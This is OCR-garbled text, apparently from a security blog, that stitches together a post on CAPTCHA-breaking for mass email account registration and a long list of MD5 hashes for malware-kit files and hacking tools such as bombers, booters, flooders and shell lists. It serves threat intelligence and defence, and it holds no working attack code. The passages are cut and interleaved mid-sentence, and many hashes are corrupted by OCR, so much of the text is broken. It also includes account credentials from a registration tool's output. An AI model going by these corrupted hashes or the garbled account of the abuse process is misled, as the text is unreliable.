Start testing 212,138, :80....[Done] 
Start testing 212.138. :80..,..[Done] 
Start testing 212,138,. *80...[Done] 
Start testing 212,138. 80 .,.,[Done] 


Maye, nponcxoant coeanHeHne c cepeepom um zarpyskKa Ms0bpaxeHnin.., 


BaWHMTHEIM KoA BHayeHHe Koga Mima aKKayHTa 


mlemk9sw 


i i | TC 


In the first example you can see an automatic CAPTCHA recognition at a Russian email provider. 
What the script is doing is basically syndicating proxies, ensuring they work, and starting 
the mass registration process while providing confirmation or error results in between. The 
CAPTCHA in question is indeed primitive, but the email provider’s clear IP reputation and launch 
pads for spam, phishing and malware is what the malicious parties are really interested in. 
Once the CAPTCHA becomes easily recognizable, the entire process of logging in and sending 
the malicious content can also be fully automated. 
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style.css 
23f20b387a10cfbc68e2773ab6036825 
background.png 
5b51cb5ca8decb32059554cbc2990a3b 
img.jpeg 138f611da4065a145927193ca2feb096 
img _backup.jpg 
c5ba9e669a7a37de37338497b58e9e9a 
loading. gif 
b3d99526048d9ce0960ff521b355098e 
Thumbs.db 
45c5c7bef801cdb7ca87394796288e71 
libtiff backup.php 
093aaa72773bc3bad0a78740fc4203d5 
ascii85.php 
9f90dea7d787ff30419d3f8e257a7f7d 
GeolP.dat 
f3f153e5ac6f252335383f1f82a67a71 
GeolP.php 
aa39adcf098c62cal126ff93f3679196 
«htaccess 
b9593ac57d30c4e7861fdc68d81a50be 
images.php 
28840a5f07e51e3361940dbebceda874 
index.php 
7265f21fe5a487573ab3b93fdd89c42d 
install.php 
851430064304437795750d0c97318963 
load.php 7ba899f4ef22b453d0e12b6c5e0c9843 
readme _en.chm 
358871c8ecfe2062f6ff807626bf6éde7 
readme _ru.chm 
96d38438ec8f8993ce0872e30feea06f 
settings.php 
1ad3966b1caa06550ee47f24278cdc9a 
standart.tpl 
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ab4c02568f9db61e21ce96e9502f56a4 
stats.php 
2f5a3775074395f6f90fd9afac3d8d3c 
«htaccess 
43fb2793322c7890b91a4b3e2f21a0ef 
1l.exe 
273bfo9c8ebcebfedf2264b54e442d8d 
2.exe 
d7e8e76f20b14402b9a8979d7e496706 
3.exe 
10d4b0c7208907660e7ad83d45ela4a5 
data.php b73bcead03715a63c34b567120f034fc 
font.dat 562fa31bba08b3f71cb71257ddb880d5 
function.php 
c6bdc03e99elfac90269e16a22b0f2fe 
geoip.dat 
49916907f103687e621d89438df5f55f 
geoip.php 
88f645ab18ad69fe22c086d0080738ef 
index.php 
97b6a7a5df83b660b2322885ba5ac677 
mysql.php 
bccb0091aa57fda0d61488a56b543315 
pchart.php 
91f99d20313f6a3b830b342a1a9c3a9b 
pdata.php 
f56ed2179a4ee0fbae706297aa8elaae 
template.php 
Odbde012eebdd442791ff1910913e76c 
up| backend.php 
401442bc230a13ce6871dba0a39602c0 
userinfo.php 
611a49b54178bbd5e0a24333dc3ab330 
virtest.php 
d1502f6d34c384d0f5da8bf8f8e6ea28 
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JsHttpRequest.js 
ee81le35e4cfe4ef93b3d14da7c69aafl 
JsHttpRequest.php 
ffad3fc29efa6c9a0c527708ef52be25 
config.php 
ef92f87091ae90933182340835a44815 
db.php 
2cd20d19f2b05f4d4e0cc86942f88c6b 
exe.php 
d897a02c78e24dd610a9a45albef32fd 
file.exe 

functions.php 
24f705ac0615115a5e9aa613da649745 
GeolP.dat 
fa685d37c5702689745d44f6bc89bd07 
geoip.inc 
5b6e59bc6d5eac1dd3872981c0feeOcc 
index.php 
a04247912274d3e58eb3d892fa044323 
install.php 
a8dc4bea19d6de20442b49ab715c5542 
mysql.php 
8946f77265f1d6447fd9820e44bb75fe 
pdf. pdf 
5eeb7d001a222e18cabe976fa62855c4 
pdf.php 
55191e23b4e2d59bd1bcb6eb7f550d69 
REED.txt bbe01751dd6755867aaa0bc2e5756799 
functions.php 
a7189512b2f6cd810520665581383f4f 
index.php 
f8f012577fce4379197d153f205b401d 
menu.js 
bc3bd487453aacaffcb199234f42f2a6 
overlib.js 
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2b8ea85c8laec89e901le2fc188ae6c79 
style.css 
98d986c4eb568afd1361c9cf5441d1bf 
ad.png 
2c5c33ef27e0292f9bc221c444f9000F 
ae.png 
b5724149383f2562b8a28c3c93b15f9b 
af.png 
5e76891b0ea40ce35b727731fd97194F 
ag.png 
375da9e564525f6d53c7830dd1916fb0 
ai.png 
afb2dadd935ee130f26ca5d3bcddd92e 
al.png 
99f2b509795448bcac16a3d5e4d43f90 
am.png 
a42ca16083d789d27d9045d3c9979df2 
an.png 
a6e86360473cd16d1d8c853f59514b93 
ao.png 
0de09d6524d63055fd17f0619372b399 
ar.png 
a3fefc34d6c6a174bb7b9aa5c37093f1 
as.png 
c3133769dc071db6750b8b43e2a920ea 
at.png 
40e750701e73e139613ee219f3fe48b1 
au.png 
728dbb9fd7a4d2d11701144e733777df 
aw.png 
454e2f9c2fbb5e319612e9bb9e5bdb8a 
az.png 
7db5553f4799bd73c7e160c66e15529e 
ba.png 
d6fd20f54b27e5d52afb837827ede093 
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bb.png 
b24a53108ef53779ea0a3dca2b67c4cc 
bd.png 
2fada25da8df5640elcbb89el1c42c6da 
be.png 
64daf985380cdael5b0bf1217fe91362 
bf.png 
79daa9db614ee16241c881ddcbf0839a 
bg.png 
9de88a8d37315834450c53bca2966e7a 
bh.png 
b62fb17920a02442e73aeee65e797077 
bi.png 
773cf13f843d33d2668552d11ca04ff5 
bj.png 
98a04fc0851d6607ba9c03ceb477494d 
bm.png 
ea5b3788a5042039a101068faddf2b9e 
bn.png 
822eab5ecaab71b3346ce5122c40052d 
bo.png 
7ef880a593b473782b865949404d7e47 
br.png 
1cb21ed3d42e2721f2c078a9c2e7e304 
bs.png 
065ac59c9115515d61bf5799be2b47bf 
bt.png 
505ffd9eb7dd8f8a6702f24656eed4ca 
bw.png 
3efe523ee039710c387d6d253f3e27b2 
by.png 
24efc2e25781351578745d05ec6dca50 
bz.png 
b04ebe3bb4e88cac54f5ae3071a1f379 


ca.png 
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1bd83d7e72b4248a5fcc1571c7dd85le 


cd.png 
a4e484cOdefd78db175c7049693f3e46 
cf.png 
b6c6826eaf120fdcdlidaedbae9clccee 
cg.png 
f7d49b08a24e0ae35928099c88901edd 
ch.png 
a6465af2197195468b5812086c8e67ab 
ci.png 
1844cdd2ad2ef1612ba64c0ad5d377da 
ck.png 
2de7040b15cc8e7625978752fc22faa8 
cl.png 
cl2eab16f4886ad558e419b54efbb1fc 
cm.png 
d8673fa3d045e7d9014fcf971c652b74 
cn.png 
dc97d35095f24b3476c6c88e26c2b615 
co.png 
fd0384b999c33332b5f2119140ffe6c5 
cr.png 
d45c1ca75408d0007cdcb17c20a10010 
cu.png 
9891f40504982bad7360964cfb938293 
cv.png 
562925976432702d7141ca32099af127 
cy.png 
1305688b4bb5e4d7dal16f84249667735 
Cz.png 
b6a6c81b638c554836f87f473d41dc4c 
de.png 
52453201cd40f6668d222485668cle2c 
dj.png 


afOfbf790f7c3ac442f81807665c422d 
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dk.png 
cO25be6cebf0f96679fa2e8102545297 
dm.png 
6cd67b103cb6646b567e6832338f8881 
do.png 
8daac20ba39bfdb460678a4925c66010 
dz.png 
c2cb5914f2088f3fae630ca4dc8c199e 
ec.png 
1452cf9eaa92d0af0fa002cf2b393300 
ee.png 
2cd366efd763elcd0a0b64eaf8a30f21 
eg.png 
e7e97b34c0492f1fd38efcb28ddaff45 
er.png 
6a6cadbe9c9a363d22a0987ff08F7Ffd0 
es.png 
6b24d99aa38dd3a75e793bf55d0ca5a8 
et.png 
c970bac7aaa5b4a444df9c19dc796e53 
fi.png 
cc25b3ad7733556815b67b2e07fcd012 
fj.png 
f98559f90173ca6897afc2fd78493559 
fk.png 
d3768dc310e5e0dd16fle9f39148d157 
fm.png 
ca8976f8af84212c6ff669C0119a1526 
fo.png 
439d8e7f90cc73eb3fdd70e83d0fd393 
fr.ong 
8b61ac49a35ae18eb49119de709a9b8b 
ga.png 
0aa08186dea41fa838592ab38e5eefed 
gb.png 
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2037e1add63c58466f6371del0bed075 
gd.png 
db6746975a2e9f0b29485197298be8d9 
ge.png 
8bedeebdd150aflale85865fd2d36d0e 
gg.png 
c909e0e77293cd95ee52b20c4ff179e6 
gh.png 
ee0c61a33928236992ceaf4c8741fd3d 
gi.png 
45dccd1c5627b6a05cedcab1b36a5d38 
gl.png 
9040e9868b760c75f92e16a35847110a 
gm.png 
0ce6141e962947fcef6b61d9al6aea04 
gn.png 
2030f20e6b5c3d972c74e70404493b87 
gq.png 
4c9aebce2012ec2c8434a4a56180edac 
gr.png 
b4d8926b67ea8fb7d3e5610b941a062f 
gs.png 
d9f82f9e336b742f642d63b33fdf8e90 
gt.png 
b2df981e16a3f0df253c3e54a065b5b9 
gu.png 
9207c613c761a93c16263229bae6fa54 
gw.png 
f7f627e214048003453dbb93f8d1fe658 
gy.PNg 
542765ae0566c588cabaca24d76bcdbd 
hk.png 
c2112aea269e633eb6ea7e8168ae86db 
hn.png 
8d6422a4f734479e733e50e9d3a10a39 
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hr.png 
189e95ffaa920d0cc68d34cd4ecbf86c 


ht.png 
9c5555379962802bb63e98d9e0a070c8 
hu.png 
b10613b7e32a1187e3353d419ddbb143 
id.png 
446c5391f66c713fdcla661e860ed22a 
ie.png 
91785609880c518c852b81e627cf2d29 
il.png 
Off73993dde0893b7d866fd7a9b97dbd 
im.png 
0a025278af6bccc8425439e111fa2ab4 
in.png 
b40464a6a3891c994e951dc62b9b9a4a 
io.png 
890360a3d924e29c31f41530946c9338 
ig.png 
ccd1867ad87dd720c1852c8dccb1c668 
ir.png 
30ce427aca0922fbca7fbcc7c9ea1l39d 
is.png 
9136610179ffb3e2ab7eb12f36198024 
it.png 
608c1d9c72e2b3d31ble5ab4ef211442 
je.png 
d26769de205622174e3b48252a261803 
jm.png 
f64e9b64a04ba633b093ec6c80bc9432 
jo.png 
aa626c1e87c1694c8e71119a7a99c121 
jp.png 


23a81fc79b2f19849c568494cae250a2 
ke.png 
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9f50f6746ea0196a4cd2c3f97e3309bf 
kg.png 
4cb87a952688211840cb72ede6c3b748 
kh.png 
7acb7a033171b80cfba707d4ad24dc4f 
ki.png 
dfffce8b50bb51d47060da3ed6883b9d 
km.png 
817ea1323027417e192a84504ce0b81a 
kn.png 
366cf710982176408ff953b382281aaa 
kp.png 
3153061038871f64b682b3dee26e3aal 
kr.png 
e06d857eee7a5352780ddeleaeb59157 
kw.png 
9a4b078ff90b68284178fcOf6c8b2bbe 
ky.png 
fbe849f19332ba4a65007b3c3de4f065 
kz.png 
1259666222b0b482e4a18baf149fb5b1 
la.png 
7e5c5aa3f9909ec2f13b972bab6961db 
lb.png 
5f9b5d7379d3e21600713d85cb8c1186 
Ic.png 
86dd037b1f0b39ff7a45602fc867b5df 
li.ong 
ad0faa3d559df7dadfc86ca67cf7a805 
Ik.png 
b8c1f3297e8139b5fde8ab62b7aafa4dd 
Ir.png 
75a1b3e16630d3ab72f7c2aca0608989 
Is.png 
90608db10c8c16d02d62d0b5da2c8600 
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In the second example you can see a great example of the adaptation process. The CAPTCHA 
cannot be 


_— 
aj89w3th 
uyygchOn 
uo3y9ejb 


Kon-Bo aKkKoB: 
8 


efficiently abused we we’ve seen with the first case, but instead of putting efforts into breaking 
it directly, the malicious parties are simply adapting. Once proxies get syndicated and verified 
for connectivity, a request for the number of accounts to be registered is initiated, the script 
then responds with automatically generated logins, and presents the CAPTCHA to be manually 
entered by the malicious party. Malicious economies of scale in action, despite that the 
CAPTCHA cannot be broken, the process is still partly automated, another example of marginal 
thinking applied in order to achive an objective. 


Sample CAPTCHA breaking project requests : 


- "| need a captcha breaker that can break captchas that are of the same style i will upload 
here.! will want a c++ dll that recieves a file path and returns a char* with the content of the 
picture (letters and numbers)" 
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It.png 
e92d8c285deef27fc6b1922417bee5db 
lu.png 
128a78c07b253a438a82094684fc6247 
lv.png 
aefcc2c9cbd0b033984e40a7ddcdd5b1 
ly.png 
bd2823e53c2d03585e02698fel6d3da8 
ma.png 
5c0ba731261778a9f79c94dc330d8917 
mc.png 
8ae40301e3cdc5864f8495600df2cd4c 
md.png 
5e08d770f2214bef5474a9bfe65f284f 
me.png 
adec57a558f6e380f940891e7613ff86 
mg.png 
4419dbc582ee1bfa452084fbe44d6585 
mh.png 
66142d343fc924684c8f45f2f92b3 fbf 
mk.png 
3d6686b29792cbbc448ea3ad8e5f6ed4 
ml.png 
d5c745c880a105478e8746b48476499e 
mm.png 
d9642943429a963758200520b88fd0be 
mn.png 
115292fcad58fbaca72831bec035a5d2 
mo.png 
cfe6f157e46cade90ccfabc0d699d520 
mp.png 
21d593bfd852726ed36462987c386283 
mq.png 
d194cf39d992fd10ab7a605876ef9c54 


mr.png 
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2a46e0e9868a6a569de66b0a93342825 
ms.png 
a2036b623b3ed5420c73a45cbc63bedc7 
mt.png 
O8ccbff9403843f40dd29c778478df35 
mu.png 
2446fcc3cdcb90ba83a81d73d08703be 
mv.png 
1006bdecdd5b8503406fd9dbcc6b85ab 
mw.png 
f52b81525e4c115ffeff0c7ce19d8f80 
mx.png 
5f56442129c508ec967b853fabe5bele 
my.png 
3bfb3d1fe07b6aaa516e647cab270172 
mz.png 
fadbf8f75d0fa3944a737c197a7489d4 
na.png 
6d95e6040a959efdaae3021e4ce5c6e6 
ne.png 
16197206849d14863b7fba892db48514 
nf.png 
828d7558c3ffe4cc6b57e905eae014e4 
ng.png 
57a39e37e6d8fdd33ae093cc7b8e05a4 
ni.png 
36488c79235a023037bae5b192e99a9d 
nl.png 
66c1a45081c07d5ec286bc55b8eadd50 
no.png 
06a62ecfl5addccbd16f0284026598b0 
np.png 
fb0f9fa51fcle15a9a8195295359f8ce 
nr.png 
47d2c71f14781c707865cf9Ff76a93dd6 
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nu.png 
fé6ffe4cc344e373bfc4df558d92b8 cf 
nz.png 
77650f7334ed840991777e2bd62754f6 
om.png 
284ba96ee80f402a81¢99a6382547b6F 
pa.png 
8b2fcfObf8fcOdcb3d387dc2807cd2ae 
pe.png 
8883d9c2466744110dd0f9364cdd4688 
pf.png 
ff42831638c42daaab110bb223e2724f 
pg.png 
67ff70d59106e62b3c3417e075d242fc 
ph.png 
6a3c026dclcele30f25ad83d2f7c45cf 
pk.png 
41044d05c745f4ffcf1734817dbaf8e2 
pl.png 
56d1a9cbf7f06685d3ab2b4d4023f2ac 
pm.png 
33c0add4c6a92753c8dac1573402427f 
pn.png 
d2b4ec666dde5114f92eb695c568a4b2 
pr.png 
c58f67c18c9e8175f786767da768c2ba 
pt.png 
ealafa9142a9c5a45f965e13c43fbad4f 
pw.png 
680850ae0d7352f0d0aa8834282e20ac 
py.png 
3d16fefd864fdf1c7890307841314cac 
qa.png 
£7822795414712654d46c699449889a8 
ro.png 
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7ad8ac2dd41582744a7a84dc6095d654 
rs.png 
adec57a558f6e380f940891e7613ff86 
ru.png 
202c5d5e00bbd879a4bb057c21b45286 
rw.png 
988d16ef917d832655fb76de4e69d343 
sa.png 
b0979e8e3eceb9e5bf9cf477b09b5306 
sb.png 
clc14eb6ff735d39a83aaeb9a99deb82 
sc.png 
ae3876648ad1c3769ed1978e72bb6f39 
sd.png 
87b5e672e17c91986f353c9b0a954ba0 
se.png 
ff673f44fc6bb90e4c0e22e763673fea 
sg.png 
d556bf3329496eb25a747814b7c64d08 
sh.png 
1bd47fd337aa3360efe1l8692e783d383 
si.png 
5107905095c58719d4d8739beb80400f 
sk.png 
67644111fd2cd81d57665128da88d2fc 
sl.png 
delce0b127bc9c19c16453389d21def5 
sm.png 
ba69ff586fc282396802a017b59cba05 
sn.png 
9e417732f30759febe6e0185277bcbe6 
so.png 
ba30a19ee2373f9b8aec1bd20d484d8b 
sr.png 
f015e14ed1cb7438d40283babe846755 
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st.png 
feofcafbf75a59c01d3al19f5c3e4db14 
sv.png 
b87706be166bf62334175ca1l8f37dd88 
sy.PNg 
8b425e88adcal1f2ff44b6201da72259 
SZ.png 
€9705342665dd59379e7026f8a3aec49 
tc.png 
f0ea57f6650e9c1c607dc6203e87a37d 
td.png 
10a576a78948f9559e592335f13cee38 
tg.png 
3184f1851503cfe812d49ee61df84cc3 
th.png 

45c05b6al 6bb2be73e2862b42264eb9d 
tj.png 
bf4c248f8c3f771100e70bf3e7dbd976 
tl.png 
10b3a65e24f61d847ecc74ad3012bf8c 
tm.png 
9704b65fcb8426968400770673d08a0d 
tn.png 
a3be19c5d6elfacd1bb94cd2aa134b05 
to.png 
ce6ed505e893f7197c473e8d433575d7 
tr.png 
5bc250325ae589668833a5bbfadb14bc 
tt.png 
03b628635e7e4f00ee1f5c6ee2 3f3cff 
tv.png 
744bf726831524f05a39192bf5e104c0 
tw.png 
7a674fb6c76d6440e23el1a0bff8418bb 
tz.png 
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7ba4083f8c27aa08ae849097b010bdfc 
ua.png 
6af4b4cac57fa2383fb43828269629Ff2 
ug.png 
f56828d99284786d1038a0a8d33c7726 
unknown.png 
18c79296dd043580f19ee5fda4c2d4c5 


us.png 
f8a8ca2d48d0ed4391c4860190ed4b1d 
uy.PpNg 
83efa7eb7b998b88c20e3e539d8b2a9d 
uz.png 
c19008fcc3aa9b8265e71f6dacc67d7d 
va.png 
f7b40f86e84758b0340c064bfb9 7f33c 
vc.png 
31b2d1aa81881deb7845df27bdde5eb2 
ve.png 
3aa716b1127e2051672b972e7d5fa774 
vg.png 
cb655d3fed33221f7fb75070bdccd4eb 
vi.png 
3465fd5451d21b2dd47923ff34fa26f2 
vn.png 
04delad176998f3ef344f1787c2e0ac8 
vu.png 
0688512b51304dfcc22939b129fc89b3 
wf.png 
75ccala0f3b207a68cfb93fb5c1d37d5 
ws.png 
d2f23034f0fb4d5860297a08171e79ae 
ye.png 
4a7407fa8807b574ef750ad93el1le8al4 
za.png 


a72e4d4789c6c4d1796e16b73694f34f 
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zm.png 
f3f22a03edcea4b27d8436df0b67dd3c 
Zw.png 
6112b506b9fe1750afd5c9bb81d0ab94 
b.gif 
4b27447d482249ff7b3423003b2abf40 
bg.jpg 
e1d846b5ec8e46451f029cd6cb76d16b 
bg cell one.jpg 
e332e5e4d6bd4e40507d86da440d502d 
bg cell two.jpg 
1b7a93f4c987b39e79670e416137ce85 
bg table _heading.jpg 
4662d876bb74d517c5f9e6396f187c37 
blank.gif 
2f93314989e17a4f12a5b63373cb5434 
bok _left.gif 
a789ef234005c050b86a070617e9ec15 
bok _right.gif 
d8f1177898599b0edb6be36e1ba615a5 
box _bg.jpg 
76124b616c9cal86641c7e4f5dc3b635 
copyright _bg.jpg 
bc3fd26be85e3df47f760a78e1832f6ff 
f.png 
ff267ae82d529941727f88965ba66846 
h.gif 
5ef0c76bec339de191e5a7f5df5010d9 
i.png 
6c02bc3e7d3b63a0bfb6052004b6389e 
logo.gif 66c5ab5a8ecf88ba774573ad2810138e 
niz _center.gif 
ef649d965cldlalb4dd06c5cf52a4cfb 
niz _left.gif 
df7a2c19e5ebc7bd2cd2e86eac58f6d0 
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niz _right.gif 
01d9b7b9e0db74d1e99fabf9f47eed17 
0.png 
0057a98a513f0b92e328059e6f7e299e 
page _bg.jpg 
ab3a254b689f918e0ef1ce56998a6b4e 
shead.jpg 
71leadefocb8725ccccb163fc76312477 
top _center.gif 
956a4bb22ac920a7549b05e4253c82e4 
top _left.gif 
83c5b433d6c6f4b0fF761928e0777a767 
top _right.gif 
5f7c8fcb23c157238dcd3fb76328e308 
Stay tuned! 


1. https://1.bp. blogspot .com/-sYr6MHnax_M/X9R6RMFP4NI/AAAAAAAALPI/01Kj3VDNQuoZRmH_rrfThOMWXhdvwzIvgCLcBGAsYHQ 
s1065/Misc_800.png 


16.10.22 Exposing Modern Client-Side Exploits Serving Kits - An AV and Snort IDS 
MD5 List Compilation - Part Two (2020-12-12 14:16) 


[1] 


i= H.0.1.C. | v2.1,003 | Truth is on the sade of the oppressed = x | 
IN GEOSYNCHONOUS ORBIT 


HIGH ORBIT ION CANNON 
STANDING BY THREADS TARGETS 


FIRE TEH LAZER! 


249 CANNONS DETECTED 


Dear blog readers, 


This is the second post part of the "[2]Exposing Modern Client-Side Exploits Serving Kits - An 
AV and Snort IDS MD5 List Compilation" series where | intend to share actionable threat in- 
telligence with vendors and organizations in the context of offering and providing actionable 
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MD5s for high-profile and popular hacking tools currently in circulation with the idea to assist 
vendors and organizations on their way to track down and prosecute the individuals behind 


these campaigns. 


Sample MD5s for some of the market leading hacking tools currently in circulation: 


Deface Page.txt 
46f1650248f415d0ce6fe0f12e0036ca 
README.txt 
19ce4ae537f305aclalf72916cb8dala 
Binder stubMOD .exe 
2cla5e2d40edd32eb2dd24a733523032 
Shock Labs File Binder v1.0.exe 
b865767be273a4b1576aa331341d8d70 
Simple Binder By Nathan72389.exe 
2e0455afe28ff35da3a27481f15d0872 
RedLions binder.exe 
4b108a13440dcb65e68eddc982df60ab 
Aneurysm E-bomber.exe 
c84d9b2ef66f28b21b87 7fccbaf17617 
Apolyse SMS Nuker.exe 
d3516fed15d2430a0cc97a5600281bfd 
Apolyse SMS Nuker.rar 
6dac0514777c004910f4e8a92280d00d 
Beaver _s SMS Bomber _Pro.exe 
33cb6ddd760b0d2ba109c330ea6c1951 
Bio Bomber.exe 
6c82cabeea5d12679e81e53f3f46ca3d 
Bomber.exe 
041cela7f14f8e4862372f740756580d 
email bomber from site.txt 
a9d11f99e1087e5b8777fa69ba97ab10 
Email bomber.exe 
365223b1f44b998c58afa698de88cb38 
gateway.txt 
f9403c4842aa10964c7e12f2075d6aaf 
hc _emailbomber.exe 
ca981bae97b4baf2b534e511lee9fc3f8 
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NSD Bomber.exe 
e€1d16380e3a7204c6099fbf92d697f89 
Nuisance Pack.exe 
11605f622492ec13c95394672603c233 
Recreation Email Bomber.exe 
8862ba8e9d4f523702031b8dc07f96c2 
sms bomber from site.txt 
9dade9986253cc215ff6a444c0f97b3b 
sms bomber.exe 

d63f5fafl1fa56f7 3fc850d801d42423 
download from openhacking.blogspot.com.txt 
FNBomber.exe 
f755c8ae0fa568e06d445471bac64d62 
Frosty Tools.exe 
2765441b551af10671db1b0f17990553 
README.txt 
200ec1a8d51219620d2efa0a347164c3 
hc _emailbomber.exe 
ca981bae97b4baf2b534e511lee9fc3f8 
CARRIERS.txt 
6b168d653b680f6858e885flef18795d 
smsbOmb.exe 
90b6597c3b925887a3c9462680fd0eb8f 
sparta.gif 
0a1832c5bff840471c313cedf4eb4600 
360Booter+GBooter XBL.exe 
6e6c8817eab4da02456bda97 9fdf1479 
Attacks+Booter.exe 
8e9bc0c564cd50b267f8b1b4ad6c1f47 
credits.txt 
e9409dc47a3ada246d21b1c664088ea7 
Desktop Booter.exe 
fcf727fe8538bc7c06ab6b7372ce5e9e 
FloristBooter 3.3.exe 
b5bf91e13da0cff70felb2501b54128e 
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- "The program needs to take a myspace captcha image and determine what the text says in 
the image. The accuracy needs to be 80 %+" 


- "We are an expert group for inputing captcha for you with very low price and high accuracy. 
We can input 10k to 100k (depending on how many you can offer to us) per day with accuracy 
at least 70 % (for simple captcha such as yahoo, it is above 95 %). We also own expert pro- 
grammers who can help you with writting your spiders or other softwares to get and manage 
all the captchas." 


racs) wesy jauvus 


Npoeepunte 


Login: iz20zvko@. 
Pass: rpem9vezyo 


| IPDOBEPHTE 


Login: qtixcvqw@- 
Pass: u82jnauwotzj 


Npoeepurt 


Login: aj89w3fh@.. 
Pass: kSpt9mxths 


Npoeepunre 


Login: uyygchOn@ 
Pass: jqydpbwsku 
Npoeeputt 
Login: uo3yv9ejb@ 
Pass: dmxqcku? 
Npoeepute 


Login: cm?xakz9@ 
Pass: h394do6lhqt 
Npoeeputt 


Kon-6o akKoB: 
8 


Beeayre cnncok npoKcn-cepsepoe: 


212,138, :80 
212.138. :30 
212,138, ‘30 
212.138. :80 


Some are purely malicious, others aim to verify the security of a CAPTCHA in development for 
instance. Let’s summarize - Why are malicious parties interested in defeating CAPTCHA’s at 
popular sites? 


- take advantage of the clear IP reputation of the email service in order to improve the chance 
of having their phishing/spam/malware email successfully received 


- set the foundations for a large scale automated spamming/phishing operations by using legit- 
imate email addresses, thus improving their chances of not getting filtered 


- automated registration of splogs - spam blogs 


- as search engines are starting to crawl sites submitted at the most popular social networks in 
real time, spammers or malware authors are naturally interested in abusing this development 
to timely attract huge 

audiences at their splogs who often have malware embedded within 


What are malicious parties doing to achieve efficiency despite their inability to defeat an 
advanced CAPTCHA? 
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HOUC.exe a075b2afb67c50adef47f47b1fc2bea7 
Shockwave Booter v2.0.exe 
1¢c72942961917ccf4fc5bele823ab4cb 
Shockwave Booter.exe 
0b16e1982a63185d4c18fcc7cdac775c 
Soccers Booter 1.exe 
b15b0e737d9b812f3eac195ae52b2316 
udp flood.exe 
00b7cca92a931ed1147f58694fd51fb5 
WicKds Booter v3.1.exe 
914bb10e7e05eb5c0d152baa67020fd8 
xDDoSeR.exe 
298beee7e3526cee6893a9cOaf9b44f1 
100 shells.txt 
d295d348f40168b1604d5cede5153130 
268 UDP GET.txt 
f10e6911e05d84b5ac71fle7d77b207b 
99 TCP POST.txt 
dd8499452931f0ae9347fd6ee3cac62b 
Shell checker v2.exe 
8f5d24c65daa2c384867c44d55cdcf51 
ShellChecker.exe 
f908b5fe0ac7d3cb76a9054112093860 
Shells 3.txt 
9f1513d570844786f6ece46364cl1la70a 
Shells 4.txt 
23fa4ef706d183b4fee7b5d66fd49406 
Shells for UBER.txt 
dbde128387d469a4bba20ad0fc5dac8a 
shells.txt 
€3622a05746802e03bd4f3f56b4bbcee 
shells1.txt 
16a04c285878b6d72d95956f4b944a06 
shells2.txt 
afb84fbfca2c58665ee0b1a2b599529f 
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workingshells.txt 
444689b389c27ca84a22ed5d92062711 
addshell.php 
4ae5c7e1cc99663e52e5fc8b027687d9 
admin.php 
efc96476463d94f3df8a135f2all1ff5b 
chat.php 0e842ccc313bb7efc8df808b023326d1 
dbc.php 
59af8c61e54964199c5f65ac099c4eed 
dbprepare.sql 
fe5ceb6833b5608c3ced9d6eb5314a75 
do.php 
1b2000290158151cda00caac858e4a6b 
donate.php 
70834c6d95f03f4be5f9dcb3c0d3a132 
editgetshells.php 
48889b3ebf6cb0e66cfb019d7436ee82 
editpostshells.php 
f9f3265948cc7d9371df4228c6d501cf 
editshells.php 
b7249deb17692cff00154b6bd13cd138 
editsloshells.php 
a96673338ac7157696f9f8a2dcl1lbaf47 
hub.php 
5flcff13559b5d7c953fb903cba8490d 
index.php 
2d13244ad3e560a101b97a6132673142 
login.php 
609d6beb4adc720697dbec6655569ff4 
logout.php 
£7f43702441b28154fb45ble2cddf99c 
logs.php a52f1d5e45fd45a2073a84d80c5427ac 
mysettings.php 
f9670faecdbb6264fff128a7 7fe209e0 
pinger.php 
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7e1d7dd679e970d5c32caeb5e76b608a 
register.php 
9ae98697ff300827719c273c881e7278 
shells.php 
76da57ecd58c007df0d2b0fa3301fade 
support.php 
9cef623e035c4acOlabcfeb1d188c651 
terms.php 
la5cb70a91efae73f9aecbe06e20923a 
thankyou.php 
0915f39c772b81c7e18bdd30103d900e 
bg _breadcrumb.png 
ef5489fd4763335037ec83d8db4eebd5 
bg cont head.png 
ff11412632f4795a16b82d7d1f38b02e 
bg fade blue _med.png 
afec82fce42cf90dc0b7590609180b01 
bg fade _green_med.png 
b780337d9933f35768c611b3d837f25e 
bg fade _red_med.png 
99e55900be62865405f9b817d6422bd4 
bg fade _sml.png 
626ae5838d62c356e1f6f5d20c44f88d 
bg fade sml_reverse.png 
9bdf8968ff8805655ccb985de33a8ab4 
bg fade _yellow_med.png 
9bdedaf6025a2175f8aed68el10f5a5c0 
bg _gallerybox.png 
f852924bc30e9b9a53f939a02e13d6d5 
bg _header.png 
90849c0d66d5e41ce0d0b99d40f18ffa 
bg _input _correct.png 
bfb68ef139087bf686e146866e5c7916 
bg _input _error.png 
76506901fe6c26973a0fefOc9be054fb 
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bg _input _normal.png 
9d01c84595b57c3b2af13b6c81650d77 
bg _loginbox.png 
427537c1e3788d7601ae1541d6fa01c7 
bg login _btn.png 
761282828cb55a3943fla5cea8d5a0b4 
bg login input.png 
de4325548cec2449a4cba6bc194a050a 
bg _nav _link.png 
607e6leffc2c2dla8dd4ef754d1bdafa 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
delete.png 
6bf9ba341234639d4550602fd35e0988 
icon _breadcrumb.png 
f785f035f85f7d27cf16bc167429bf65 
icon expand grey.png 
5ec05a6a02a3b03f08dfa02393c93519 
jquery.wysiwyg.gif 
2a6a0ce59673569979df7e1c58b338b5 
loading.gif 
dd6b7bO0bf5c3af22499abc0a9eelelb2 
logo.png c5f2ee8e4d5209e5e4bbed6aceac69ac 
search _btn.png 
6d495453e2e9b122f9e7029c5b515184 
status high.png 
856b75954f9ea0415656461161264248 
status low.png 
7d03c178b687be7c60a54670b38672f5 
status med.png 
55248bcel3ed0ce74dc44b683484bd1le 
visit.png 
8a84a5d52aaa4b242af481969b9c774a 
examplel Irg.jpg 
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- humans entering the CAPTCHAs while the script is auto generating, storing and auto logging 
with the passwords in a combinated with the human entered CAPTCHA 


- adapting compared to putting more efforts into rocket science as whenever a CAPTCHA cannot 
be beated automatically, as you already saw on the second screenshot, they’re making it easier 
for humans to enter the CAPTCHA and faster compared to an end user browsing 


- outsourcing making it sound it’s more of a quality assurance project of CAPTCHA to be intro- 
duced on the market 


What can web sites do to prevent that sort of malicious behaviour? Strong CAPTCHAs should be 
in place by default, but taking another perspective, the way | discussed how click fraud could 
be easily detected by advertising networks syndicating IPs of already known to be malware 
infected hosts, in this very same fashion we could have CAPTCHA system that would check to 
see if, for instance, default proxy ports are opened at the host trying to register, and whether 
or not they’re part of a botnet. With data like this now a commodity, a prioritization process to 
closely monitor mass registrations from these IPs is a pragmatic early warning system. 


Interesting reading on the big picture too - [2]CAPTCHA - The Broken Token : 


"How much does it cost to have a CAPTCHA hack custom developed? $10 to $20 ought to 
